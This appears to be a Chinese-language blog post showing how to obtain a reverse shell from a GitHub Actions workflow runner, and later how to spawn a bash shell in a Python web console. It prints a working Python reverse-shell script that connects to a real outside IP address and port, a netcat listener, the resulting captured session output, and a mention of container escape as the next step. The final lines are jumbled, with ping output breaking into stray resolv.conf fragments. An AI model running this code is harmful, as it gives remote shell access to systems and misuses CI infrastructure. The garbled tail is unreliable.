- Published on
shell
- Authors
- Name
- 大聪明
- @wooluoo
在等待反弹的主机上面执行
root@vultr:~# ufw status
Status: active
To Action From
-- ------ ----
22/tcp ALLOW Anywhere
8085 ALLOW Anywhere
22/tcp (v6) ALLOW Anywhere (v6)
8085 (v6) ALLOW Anywhere (v6)
root@vultr:~# nc -l -p 8085
bash: cannot set terminal process group (589): Inappropriate ioctl for device
bash: no job control in this shell
runner@fv-az973-319:~/work/nuclei-wordfence-cve/nuclei-wordfence-cve$ pwd
pwd
/home/runner/work/nuclei-wordfence-cve/nuclei-wordfence-cve
runner@fv-az973-319:~/work/nuclei-wordfence-cve/nuclei-wordfence-cve$ iip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 60:45:bd:4a:c9:12 brd ff:ff:ff:ff:ff:ff
inet 10.1.1.36/16 metric 100 brd 10.1.255.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 fe80::6245:bdff:fe4a:c912/64 scope link
valid_lft forever preferred_lft forever
3: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default
link/ether 02:42:83:c1:f2:82 brd ff:ff:ff:ff:ff:ff
inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
valid_lft forever preferred_lft forever
runner@fv-az973-319:~/work/nuclei-wordfence-cve/nuclei-wordfence-cve$ curl cip.cc
<lei-wordfence-cve/nuclei-wordfence-cve$ curl cip.cc
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 148 0 148 0 0 202 0 --:--:-- --:--:-- --:--:-- 202
IP : 172.183.131.33
地址 : 美国 美国
数据二 : 美国 | AOL美国在线公司
数据三 : 美国
URL : http://www.cip.cc/172.183.131.33
在github上面,创建一个工作流,然后执行,比如创建一个python脚本
import socket
import subprocess
import os
# 创建一个套接字对象
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# 连接到远程服务器
s.connect(("155.138.231.150", 8085))
# 将标准输入、输出和错误重定向到套接字
os.dup2(s.fileno(), 0) # 标准输入
os.dup2(s.fileno(), 1) # 标准输出
os.dup2(s.fileno(), 2) # 标准错误
# 执行一个Shell
subprocess.call(["/bin/bash", "-i"])
然后执行这个工作流,回到监听服务器上面,就可以看到成功返回的会话了
root@vultr:~# nc -l -p 8085
bash: cannot set terminal process group (589): Inappropriate ioctl for device
bash: no job control in this shell
runner@fv-az973-319:~/work/nuclei-wordfence-cve/nuclei-wordfence-cve$ pwd
pwd
/home/runner/work/nuclei-wordfence-cve/nuclei-wordfence-cve
runner@fv-az973-319:~/work/nuclei-wordfence-cve/nuclei-wordfence-cve$ iip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 60:45:bd:4a:c9:12 brd ff:ff:ff:ff:ff:ff
inet 10.1.1.36/16 metric 100 brd 10.1.255.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 fe80::6245:bdff:fe4a:c912/64 scope link
valid_lft forever preferred_lft forever
3: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default
link/ether 02:42:83:c1:f2:82 brd ff:ff:ff:ff:ff:ff
inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
valid_lft forever preferred_lft forever
我发现github上面这个工作流是运行在一个docker容器里面,下一步如果想突破这个容器,那就涉及到容器逃逸了。
另外一个好玩的地方,访问这个网址 https://www.python.org/
可以练习一下linux基本命令
Python 3.10.5 (main, Jul 22 2022, 17:09:35) [GCC 9.4.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>>
>>> import pty;pty.spawn("/bin/bash")
pwd07:35 ~ $ pwd
/home/.anon-ff70770a843e4faebfba6f2b
07:35 ~ $ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens5: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 9001 qdisc mq state UP group default qlen 1000
link/ether 0a:ff:e9:4e:6c:53 brd ff:ff:ff:ff:ff:ff
inet 10.0.4.86/23 metric 100 brd 10.0.5.255 scope global dynamic ens5
valid_lft 2938sec preferred_lft 2938sec
inet6 fe80::8ff:e9ff:fe4e:6c53/64 scope link
valid_lft forever preferred_lft forever
3: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default
link/ether 02:42:f8:81:30:7c brd ff:ff:ff:ff:ff:ff
inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
valid_lft forever preferred_lft forever
07:35 ~ $ curl cip.cc
<HTML>
<HEAD>
Access Denied
</HEAD>
<BODY>
<h1>Access Denied</h1>
<p>
Access to arbitrary websites is not available from free accounts;
you can only access sites that are on our
<a href="http://www.pythonanywhere.com/whitelist">allowlist</a>.
If you want to suggest something to add to our whitelist
drop us a line at PythonAnywhere Support <liveusercare@pythonanywhere.com>. It will have
to have an official public API.
</p>
<p>
Alternatively, you can sign up for a paid account at
<a href="http://www.pythonanywhere.com/account/">http://www.pythonanywhere.com/account/</a>
</p>
<p>
If you have already got a paid account and you're still getting this messge,
you may need to reload your web app (from the "Web" tab) or restart
your consoles. If that doesn't help, drop us a line at PythonAnywhere Support <liveusercare@pythonanywhere.com>.
</p>
</BODY>
07:37 ~ $ ping baidu.com
PING baidu.com (110.242.68.66) 56(84) bytes of data.
5 # configured search domains.
6 #
link/ether 0a:ff:e9:4e:6c:53 brd ff:ff:ff:ff:ff:ff
#
# Third party programs must not access this file directly, but only through the
# symlink at /etc/resolv.conf. To manage man:resolv.conf(5) in a different way,
# replace this symlink by a static file or a different symlink.
#
# See man:systemd-resolved.service(8) for details about the supported modes of
# operation for /etc/resolv.conf.
nameserver 127.0.0.53